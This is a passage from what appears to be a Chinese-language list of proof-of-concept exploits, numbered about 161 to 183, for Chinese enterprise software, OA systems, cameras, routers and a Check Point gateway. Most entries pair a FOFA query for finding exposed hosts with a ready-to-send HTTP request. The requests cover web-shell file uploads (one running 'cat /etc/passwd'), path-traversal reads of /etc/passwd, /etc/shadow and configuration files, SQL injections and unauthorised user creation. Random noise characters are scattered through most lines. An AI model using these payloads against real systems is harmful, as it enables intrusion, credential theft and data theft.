User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.361 w! v. i; S$ e: @( r' c. M) y
Connection: close
* `# g/ z3 W( j5 c+ J9 U0 Y7 oContent-Length: 445
2 f/ q( V+ w% e7 g9 LContent-Type: text/xml. g1 |7 i3 x2 b. d5 N& H
Accept-Encoding: gzip
" _5 _% i, g/ e) m8 {7 P
0 c8 D- \3 I, d) n8 d& G- s- S<?xml version="1.0" encoding="utf-8"?>
9 Z- |( f3 `7 x<soap:Envelope xmlns:xsi="2 ]5 j, \) s$ v
http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"# w, n2 u! F6 C5 F4 q6 q
xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">6 `5 o) E# C, E# A
<soap:Body>0 _8 Q& o/ E: U
<UploadResume xmlns="http://tempuri.org/">
. @" \  G  n7 ?  ?- Y4 l6 `<ip>1</ip>
4 E' L; F0 y* O- [& p. m% B8 _<fileName>../../../../dizxdell.aspx</fileName>8 v5 z6 j; Z0 p9 ^& J
<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>* W* B5 P: u6 z( E/ \$ y
<tag>3</tag>
/ Q/ l8 k4 ^5 H& M: ]</UploadResume>: c7 L7 s* h, O4 B1 V  \, H& b
</soap:Body>
: [) t1 U! C. u0 ?8 {) u; j) x</soap:Envelope>
5 h9 m/ g7 Q$ H, w0 p, C$ ]4 X# b1 _6 G% G" \# H9 R) R7 z7 N
& g% V9 N. c- t6 J% x" f5 i" i
http://x.x.x.x/dizxdell.aspx
$ H& ]+ S" ?) a! b& n
  m0 T6 n. b; S* Z+ L& J6 c# X162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传' e% C, _) H  f  D2 n- k/ O. B6 `% N
FOFA: app="和丰山海-数字标牌"0 H5 i" u! Y- J% O; ]( d/ S! b' M
POST /QH.aspx HTTP/1.1$ h* \5 L: g8 p9 ?  [/ v9 V! g6 Q& h
Host: x.x.x.x% f9 `% e5 Q8 ~. Z7 Q" ?2 l% G
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.03 Y0 H6 i2 c0 |' e5 e4 T* \: ^
Connection: close
" d, a4 U( a6 p0 [1 MContent-Length: 583( r% `0 r# L* g4 e; G: n0 d
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey+ W3 l- @2 _+ j% G
Accept-Encoding: gzip
+ [8 b2 Y. W0 {* z
2 i/ h% K; M$ l) o1 \/ g------WebKitFormBoundaryeegvclmyurlotuey7 H, ^* ~6 r6 ]9 L' ?3 }
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"
" d: H7 v" R4 Y6 Y0 hContent-Type: application/octet-stream
2 `& S$ t# _: o, O! G& {5 f/ c# X
<% response.write("ujidwqfuuqjalgkvrpqy") %>& m9 N& s) b7 s" a; \) A0 Z
------WebKitFormBoundaryeegvclmyurlotuey* N& X' ]2 c% `( T( ~
Content-Disposition: form-data; name="action"6 K5 \+ S; M5 }! I, g: c4 M* Z5 R
* o" d2 V& ]* I- Q
upload
$ R# m! T. L  g9 P) s------WebKitFormBoundaryeegvclmyurlotuey
1 @/ ~6 T+ O8 _' y  jContent-Disposition: form-data; name="responderId"
1 G9 ~7 A5 q6 A- H) g& B: q/ Z3 d* H/ h7 Z; s+ l* Y2 t
ResourceNewResponder
1 i- L1 t' T( M% Y8 N------WebKitFormBoundaryeegvclmyurlotuey
' D* x, I1 t1 s+ T) t  l1 oContent-Disposition: form-data; name="remotePath"
9 w  @' s- B. f2 R
8 b0 K5 Y8 k. W: V/opt/resources
' _& y+ p  d( P------WebKitFormBoundaryeegvclmyurlotuey--
: o0 F1 Z! l" i" e, V
7 `1 L1 h" O$ f( [) j: q
& P5 s" K6 V( [; Khttp://x.x.x.x/opt/resources/kjuhitjgk.aspx
8 x1 P7 h. G' m. v4 T
& A$ t: V3 _% H6 t( o" e9 ?' F! S163. 号卡极团分销管理系统 ue_serve.php 任意文件上传
" ?3 B4 [9 d) x/ D2 G8 I  VFOFA: icon_hash="-795291075"7 r5 c  U' ^$ ^" M
POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
/ L8 `0 S/ n( }5 G! q8 P" s, hHost: x.x.x.x
. E9 R) L( \' L3 \" kUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
; r4 n' E3 F  C& f+ BConnection: close
+ }' S; D  Z$ EContent-Length: 293
% i; T. y: H9 p- t8 T. MAccept: */*( o9 h$ @& ~3 F
Accept-Encoding: gzip, deflate  Z9 K# ^9 j$ l5 D4 m) y
Accept-Language: zh-CN,zh;q=0.9
% W' n* J0 h* v) R$ V$ G6 uContent-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod' O% ^4 f4 G5 a( p" J$ g

6 c; A% N) O9 f7 ^8 g) N------iiqvnofupvhdyrcoqyuujyetjvqgocod& i9 C$ u$ d+ ?& v
Content-Disposition: form-data; name="name"0 h! o  P: z* n" _/ K
  o2 N8 J  p1 O* z$ ~
1.php
# O" E, B# b: a) l9 T------iiqvnofupvhdyrcoqyuujyetjvqgocod
8 E! t; c6 k- T9 q, c1 tContent-Disposition: form-data; name="upfile"; filename="1.php"
/ Q$ W& z5 F* w/ GContent-Type: image/jpeg* a3 B8 t* Z2 r- z3 C2 e- q
& s7 c/ t- _3 ^1 o" W1 O. V7 q
rvjhvbhwwuooyiioxega
, x* R  p9 A0 G: O. j------iiqvnofupvhdyrcoqyuujyetjvqgocod--
- u8 e) x0 E' _: L! d3 q7 s( G5 M* C/ b4 d

# \  S( P, E! P3 [' |3 }: G164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传/ V) J: s" G8 D) o
FOFA: title="智慧综合管理平台登入"! Y( K, z9 E" V3 r: N5 r" a( D
POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1. x, k: q. m5 c/ b3 _3 N# j) x' e5 \
Host: x.x.x.x
4 w& u9 v# I9 i  O2 BUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
# {; A2 `3 W7 vContent-Length: 288
6 O! u+ }, ^# [9 {- q5 T2 _Accept: application/json, text/javascript, */*; q=0.012 A% y4 a2 m, v1 h/ v2 q. r
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2,
5 L9 x6 B- e' R+ ?4 f$ hConnection: close
3 b6 P8 f" B+ xContent-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl/ F6 b$ m4 E$ x1 g; b* o8 t8 _" \/ k
X-Requested-With: XMLHttpRequest+ X5 J3 c9 q. Q: W3 T
Accept-Encoding: gzip
, t/ f$ M# G& n  B3 G; Q/ k# D/ _5 U# N
------dqdaieopnozbkapjacdbdthlvtlyl; k3 t2 X  t8 O3 ]/ J; l4 ]+ M
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"
3 M, X5 J# ]; rContent-Type: image/jpeg6 y% p6 u0 O( e% m3 S% k4 I7 O0 h

# t) J& r4 X! `/ u<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
- O2 {8 E6 D. V/ D7 n------dqdaieopnozbkapjacdbdthlvtlyl--
( X+ x  }) L" b4 {/ H+ T
) I$ c2 k$ _7 [2 W1 \. r# y% y, A- a6 p  ]: [7 H" n/ n6 y6 U1 b, X
http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx
$ R3 T7 W8 B- `- q( _
; U7 D# P) r; I: |" t/ g% n165. OrangeHRM 3.3.3 SQL 注入
9 p3 c, X2 B- x/ \CVE-2024-36428
9 P- t* [# w1 e# vFOFA: app="OrangeHRM-产品"
+ e9 e  f; y$ G4 ?2 tURL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))
, a8 T2 e$ \0 Q
  u, T1 O) L* H
& _$ B$ I% l  y& ^7 L2 _7 w8 k- g: F166. 中成科信票务管理平台SeatMapHandler SQL注入
- M$ r, W+ ]1 vFOFA:body="技术支持:北京中成科信科技发展有限公司". h5 W1 o" T4 e+ Z! S" W
POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1# a7 P7 N' M3 s- b8 d# |
Host:( z3 X% ~# k3 i! ~/ C: {: \4 {  L& A
Pragma: no-cache
9 k4 r8 E. N3 ?7 v" m. u  q; m: {; L1 gCache-Control: no-cache/ ?# i* f" W' |1 P- c" Q
Upgrade-Insecure-Requests: 13 n( i0 Q( h7 L  A+ h9 P
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
" E: P% r" b* y5 c. B8 mAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.78 f% @$ b4 v4 v: P  y
Accept-Encoding: gzip, deflate% l; L5 y% k* q0 X2 S+ c5 r  R
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
+ m% E: k2 H# K9 bCookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE
8 c5 _4 s+ _( x6 S- OConnection: close& ~1 r3 c1 Z& G$ U. \- g0 C
Content-Type: application/x-www-form-urlencoded
( L  S; _0 A9 C8 e& r2 P) \% [8 MContent-Length: 89
7 A5 u' k9 E# T- Y- e' y
' _0 T, q+ z6 [8 e$ G2 S- A: X! JMethod=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE
1 a7 C( R9 C$ N3 m+ J4 r
1 I, J  ~" L+ O* S# J; t0 p+ L1 Q4 R; B" k1 ^
167. 精益价值管理系统 DownLoad.aspx任意文件读取
4 p4 ^* u+ H; [3 [$ ~; RFOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"8 E& }; \9 Y, p% `
GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
6 M! P2 ~* L/ d  x+ a, JHost:; D$ [& X4 I' e1 F! B/ v$ U
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36: f( A! C  L' R+ ], k7 t% i
Content-Type: application/x-www-form-urlencoded, Q6 I2 D4 |6 C2 d' m
Accept-Encoding: gzip, deflate
$ A! |- |7 e9 F$ e# o. ~+ eAccept: */*
/ x. [; j  ]! ~# d& K% ]Connection: keep-alive- g) i* Z  b  ^+ n6 s9 H

4 R# N% H3 d- R9 L: W9 H: X+ A
. o) \: V  [; F$ V$ \7 z; [168. 宏景EHR OutputCode 任意文件读取: o0 x7 }+ w# ?) C- l
FOFA:app="HJSOFT-HCM"
7 l! i  z# s+ V6 M; CGET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1# a/ o+ p; e5 _) x! c  W
Host: your-ip/ A1 A1 S( Y0 @  r* k# ]. s( W) |
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36% l3 M7 c- w0 h0 u( S  m6 ?
Content-Type: application/x-www-form-urlencoded: u; Z  |1 V  a/ v/ n4 O$ ?( R! T6 G
Connection: close) {' e' v, B5 ~

$ }9 J0 c- w# |, M' y7 l
7 D( L* v3 N- I* M8 ?7 L
) H) ?# b9 ~, G2 ]169. 宏景EHR downlawbase SQL注入; M. d) Y6 A6 H6 Z
FOFA:app="HJSOFT-HCM"
+ K! _  F! [8 I9 Z# e+ iGET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.13 a1 t/ c& n/ P6 V7 f3 C! S- y/ ]
Host: your-ip
+ M# @5 ]4 h/ Q+ v# v; }User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
0 l" x$ s- A5 D0 [Accept: */*( {  x8 Y# V3 E4 A5 `9 f& y' z
Accept-Encoding: gzip, deflate9 w+ G& a, @  L5 [' e
Connection: close
+ N- y1 o' N3 C3 K- o5 s5 C4 A/ S* c, [& ]' V- }
% D* c6 e% q8 z% t* n

3 |+ Z5 t+ o& t! S170. 宏景EHR DisplayExcelCustomReport 任意文件读取( T! ?* {, b2 @5 I
FOFA:body="/general/sys/hjaxmanage.js"3 x" k+ x1 H6 O. ^" m0 L& g
POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.12 J  c5 B7 h, B# r2 R. R; O
Host: balalanengliang
8 ]1 @1 Q5 o" ], g2 i0 Q7 G: b" KUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36. N# ?: B4 A+ ~/ T
Content-Type: application/x-www-form-urlencoded
! u, P8 j$ Z7 f% n6 q5 D! B
4 I3 c% u- V- n; O! efilename=../webapps/ROOT/WEB-INF/web.xml8 v3 L. Z' K6 a$ D
- e/ I: }  E: X9 ~. k, \/ I) T* }! h

% |) W: l- E* i. Q% T5 ^0 I171. 通天星CMSV6车载定位监控平台 SQL注入6 U- C4 ]: P  X9 D* u& s  x& U: i  k; _
FOFA:body="/808gps/"2 K( i' |  a0 O7 Q3 X8 }/ ~
GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1, v4 N0 d# ^' k+ D4 v+ ~. K  {+ v
Host: your-ip8 W& B! X; V4 k; s
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0) M) K$ w- n; b, n
Accept: */*( n. A& B, m! @# E; ?
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
" L5 c& ~! _% I% aAccept-Encoding: gzip, deflate: ]( W0 E  Q! P  I" |/ I1 t( B% k
Connection: close
; @( i$ n5 A! \0 p7 P' F2 j
- C' t3 u  U. x4 J: k. e2 H  C) S1 v5 q1 `7 J) t( [0 u' T

- u; R2 y$ E* b) h& E172. DT-高清车牌识别摄像机任意文件读取1 P; ?* E) y. \/ {* E+ f
FOFA:app="DT-高清车牌识别摄像机"
7 i5 P, |" p- a/ k! ~2 M# @GET /../../../../etc/passwd HTTP/1.1- F5 X% l) j# v
Host: your-ip
2 H: E7 F1 i! TUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
3 Z6 Q; r; n3 o( nAccept-Encoding: gzip, deflate9 [! D% R3 V5 K6 w( f, f$ p- L" a+ X
Accept: */*
9 f7 s- S$ J1 Z* \4 nConnection: keep-alive5 S3 F, z8 H6 u- |  B/ @( c7 u
) X' H6 o. }+ a1 v& v
" @, L( b: H8 Z/ v- J% V6 R  P

, w, ?; F+ Z( W0 s1 `2 M173. Check Point 安全网关任意文件读取
: h( c/ V; u  _+ Q( FCVE-2024-249191 x- \, ~8 m% S3 k6 d. U: Q
FOFA:app="Check_Point-SSL-Network-Extender"" L5 \" z, N! o  {2 ]
POST /clients/MyCRL HTTP/1.1  Y- g+ I; e3 Q. z: F5 h7 v8 Y4 Z
Host: your-ip/ P4 @$ i$ K4 V% B0 A4 j3 P( c! b
Content-Type: application/x-www-form-urlencoded
6 v2 d8 K0 r* D# I0 H" y: y
6 e/ F9 p1 ]# A3 K. R, E3 A( KaCSHELL/../../../../../../../etc/shadow
/ R: `% c- a5 V- c0 \) I' P' h
* J% X( J7 |; z1 j  J; _  B/ ?( c
/ ]9 Y6 q& v# \) L  J! N) W
174. 金和OA C6 FileDownLoad.aspx 任意文件读取
* e% V! a  a% H7 _: mFOFA:app="金和网络-金和OA"
, R( ~" ^+ {+ w2 r& Y1 r6 NGET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.15 @$ Q4 _0 h, `) f. Z* }; t7 G$ U
Host: your-ip
  e, J: Z; @& s* S0 iUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
9 I2 O& b% }, @( ?) X2 OAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
7 n( Y; K( Z; `3 U3 z0 Y2 Q+ PAccept-Encoding: gzip, deflate, br8 H2 U5 M7 P7 A% A: e3 Z' m
Accept-Language: zh-CN,zh;q=0.91 l; @: X. w$ {% ^( D
Connection: close& f0 p$ W* P, R/ e0 d# ]

" q; {# A6 }# l* o# C6 u( @; d+ ^1 {5 K) N8 o) T" x- J7 H
  ]; E7 q. F" O0 x% s/ S
175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入
" n1 Z3 r; k1 k. f- Q, S: K* SFOFA:app="金和网络-金和OA"
, N* {. [9 Q' I! ?+ ]+ hGET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1
* |5 S" E& ]+ j0 @1 }8 i, O6 ^, YHost:
  i+ U! E  U. M: ~% pUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36% u. e! Q+ D0 p* c
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.89 `1 ?# |: e2 Q
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
3 J, v" ~$ F+ M2 H, `& d9 U4 b4 lAccept-Encoding: gzip, deflate
; d4 W7 ?$ P4 t, i1 {Connection: close: }8 L0 g$ S: v: g" ]0 U  ?
Upgrade-Insecure-Requests: 1! U& h# R# g3 I4 f/ B) f  z9 a* U
' m1 e$ B% ]7 ?4 ^

0 M2 p! W6 J3 e( l) E176. 电信网关配置管理系统 rewrite.php 文件上传
% O" ^' N1 l6 M3 \+ aFOFA:body="img/login_bg3.png" && body="系统登录"
, j+ C, i$ b* k/ H6 s5 ~2 q( K- TPOST /manager/teletext/material/rewrite.php HTTP/1.1
( y: H; E! G+ w7 UHost: your-ip8 N2 b! \/ t; U; P$ t7 y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
3 m: o) k3 ?7 y6 a9 xContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT! f8 F0 C. F6 e, x! N. [$ a
Connection: close
* D* L: }5 H) h0 f# M6 t' @
. R- e- ~, c5 V7 p0 [------WebKitFormBoundaryOKldnDPT! G- y, e, X: r4 |
Content-Disposition: form-data; name="tmp_name"; filename="test.php"' r. @! O' ^' x0 ?7 }9 `$ q( C
Content-Type: image/png# K5 f+ {$ r9 P' |( @( z# F! q. ^

1 d0 [1 p$ {5 S; u/ p( F<?php system("cat /etc/passwd");unlink(__FILE__);?>+ ?$ _6 r+ n# d# O" g1 z
------WebKitFormBoundaryOKldnDPT; k6 v) u; a6 r; {& F! S. q3 U+ X
Content-Disposition: form-data; name="uploadtime"6 y/ R2 @" {( D/ p- e2 k4 S* e* G

2 {2 r; O0 e( A9 g * l( O. f! ~3 h+ ^+ S% }, @' J7 M
------WebKitFormBoundaryOKldnDPT--
$ a6 U3 a9 P9 \% H# l7 c# E& V6 o& V; f4 v! M

( t0 e: K& u) t, s
5 K7 T1 }+ f( j" i/ g5 F177. H3C路由器敏感信息泄露" O5 g1 B5 r* v* t, V4 |# e$ I. S
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg3 h2 w2 ^, I6 y5 w
/userLogin.asp/../actionpolicy_status/../M60.cfg
# ^- e4 S  K7 Q# {! X4 U/userLogin.asp/../actionpolicy_status/../GR8300.cfg, E7 P, V/ T, S' _! g% m
/userLogin.asp/../actionpolicy_status/../GR5200.cfg
) |+ T+ x( Y, F# w' M. B2 z  b) L/userLogin.asp/../actionpolicy_status/../GR3200.cfg: k* y( m: Q: V& c
/userLogin.asp/../actionpolicy_status/../GR2200.cfg6 s3 {& U" `7 S* |& x: w
/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg8 o1 S" k6 p1 O9 ]0 C( \5 A
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg1 `9 g$ s! z  w
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg
' {; P9 q* `1 V( ]* _3 X6 P  `/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg; c! r: Q; x; D: y( m
/userLogin.asp/../actionpolicy_status/../ER5200.cfg
4 V: @/ D- o& F. I0 ?/userLogin.asp/../actionpolicy_status/../ER5100.cfg6 \! _3 W5 \* l2 s+ z  w- s/ P
/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg
- x4 k% g5 R# q% U" C% f3 O/userLogin.asp/../actionpolicy_status/../ER3260.cfg; f) J+ H: I" Q& S! N
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
3 L" U. L( ~- V* r( ~4 Z8 V: e/userLogin.asp/../actionpolicy_status/../ER3200.cfg
1 @( [: f5 L9 B/ ?& E% z# R+ q7 d/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
% L) l8 d; X9 D$ l7 a/userLogin.asp/../actionpolicy_status/../ER3108G.cfg/ ?2 l: h  q. z' y
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg$ p1 X' T3 K# T; E! r
/userLogin.asp/../actionpolicy_status/../ER3100.cfg
! M/ q/ v5 K$ H+ e: a6 E/ F/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg
: N) m7 Q& S% T( ~$ A2 a
$ b9 t6 R* `% E  S* T8 y( L+ e+ L* z$ m- n: d( h/ J8 S
178. H3C校园网自助服务系统-flexfileupload-任意文件上传9 [5 q' {+ W1 ]2 m; k# A
FOFA:header="/selfservice"
1 l9 A% y9 W# H9 _5 K7 bPOST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1) }' v1 ^& v( K3 E3 X9 M
Host:* m% c' j5 S& E8 r9 R: ]. K
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
% a' k8 ]- O* u) b+ M: TContent-Length: 252
9 r2 L& g2 j6 g1 Q' VAccept-Encoding: gzip, deflate
0 O4 m& n) r5 YConnection: close
$ r* u* P2 I+ J. xContent-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l
! [: F$ ~. W" `  Q- h-----------------aqutkea7vvanpqy3rh2l
. s2 T( j& ~; R0 M7 RContent-Disposition: form-data; name="12234.txt"; filename="12234"
+ i# \# T& m: z3 M/ u& nContent-Type: application/octet-stream1 J3 q  Y% i& [; B3 q( d2 z
Content-Length: 255: O0 F5 e: K% }# `1 ^6 D
7 d* T5 e5 X  U7 ^4 ]& a
12234- ?( n4 b# G) [; f8 [8 v( f' I
-----------------aqutkea7vvanpqy3rh2l--" P& ?, }- h9 a; `
& Q8 A* g$ o7 K" L) K
! X: U( e3 L3 g: a
GET /imc/primepush/%2e%2e/flex/12234.txt
3 k" E+ i" D+ D$ H8 D: M+ {
4 b! U& c* ]* l" g6 `% i1 G2 j* E. \4 e2 o/ ?
179. 建文工程管理系统存在任意文件读取, r' U" U$ P1 b- V& r
POST /Common/DownLoad2.aspx HTTP/1.1/ ~! `8 ]- A5 M; p
Host: {{Hostname}}6 o( y- J6 @6 H
Content-Type: application/x-www-form-urlencoded" `+ R$ N5 k* k- d: i% q9 F8 b
User-Agent: Mozilla/5.08 E5 `% T! p$ g: m% Y9 ?
- p! H& C1 x! P
path=../log4net.config&Name=* E& M. B  c* h+ W: j+ R
+ l9 ?( Y5 v$ U& w) W
' W1 s& D6 T9 @- Q% o; v8 \
180. 帮管客 CRM jiliyu SQL注入
( Z1 \3 I: |1 u$ s: b. eFOFA:app="帮管客-CRM"7 V! m6 d! K9 m: d7 E; \6 Q
GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
. o1 ^0 y7 C3 v) SHost: your-ip$ B& Y) Y! ?0 I
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36& i8 Z" h0 q$ w/ \5 D# ^: ~
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
! E0 ^- T5 z' D4 D: FAccept-Encoding: gzip, deflate
1 E; Z, N) d! |" |* [Accept-Language: zh-CN,zh;q=0.9
5 p- l0 `% p( J6 S. CConnection: close
% i! ?* N1 U% x, B! F) F  v
. A, _- r' d% w, X1 a9 C  R  s4 f6 h  n6 C
181. 润申信息科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入
% @1 p8 o, x$ U" q- r9 ^FOFA:"PDCA/js/_publicCom.js"
, Y5 [$ e  b! {9 ?/ c8 a( dPOST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1
+ F# Z8 e$ _- H- p/ P6 V8 RHost: your-ip
1 Y" M+ [6 Z: f7 BUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36. `8 B- ~& P3 Y( H$ _% a' p
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
- i3 K9 W# n+ I( S( l" n( i) sAccept-Encoding: gzip, deflate, br7 d5 P' Y, J& E: y0 t5 q. \
Accept-Language: zh-CN,zh;q=0.97 Y, t; ]5 l. l( W9 }0 Y- ~
Connection: close
, S5 Z* B2 \1 W1 ]' f" GContent-Type: application/x-www-form-urlencoded9 B' T% v$ o8 e8 l4 R
( ^! {4 M0 b# X
# m- p) z5 i, k5 L
action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20
- K, w% _# E5 g1 M3 P& q+ ~
, _' h9 @/ D3 D" A, h" E) Q
/ V/ J, N. G' S$ u0 O. V+ ?3 D182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建
! k" y# l$ G. p4 nFOFA:"PDCA/js/_publicCom.js"
# W4 k+ @+ U7 u5 o( y: u* \POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.13 B1 P! Z  Z) W4 ^6 d  |
Host: your-ip1 \9 n6 w6 Y; x+ a# q
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36. o$ ]* W7 Q/ E# @; a
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7- o, _6 v: G8 k0 S3 `" L
Accept-Encoding: gzip, deflate, br
# j) @5 b) r3 ?4 }: EAccept-Language: zh-CN,zh;q=0.9
) Q9 m" a3 J' H2 O7 B7 xConnection: close' s! W1 A7 p5 `, R; o9 k
Content-Type: application/x-www-form-urlencoded( ]3 ]5 ], m  ]

$ A4 W  X) E" K: ?  q5 N
- g. k% b2 U. k; z2 Qusername=test1234&pwd=test1234&savedays=1. P' m# E4 f8 _3 @

# k# t1 _# p/ y
9 z: G$ ^4 \0 \7 @183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入
  t& a# N4 u: [0 W/ a  S+ S8 E4 iFOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"
, H1 J5 n) {0 \) c8 mGET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1
3 A" c" c8 R) S, tHost: your-ip
2 l4 l* l/ }1 k) ]6 ?- e  DUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36/ B+ _9 A# y- I2 f
Accept-Charset: utf-8
2 M, H5 X6 A; eAccept-Encoding: gzip, deflate
3 G3 v+ b/ w. }: @) nConnection: close0 Y/ I5 T. @* C3 n- Y5 f5 g  a

6 s& I( N; ]0 d
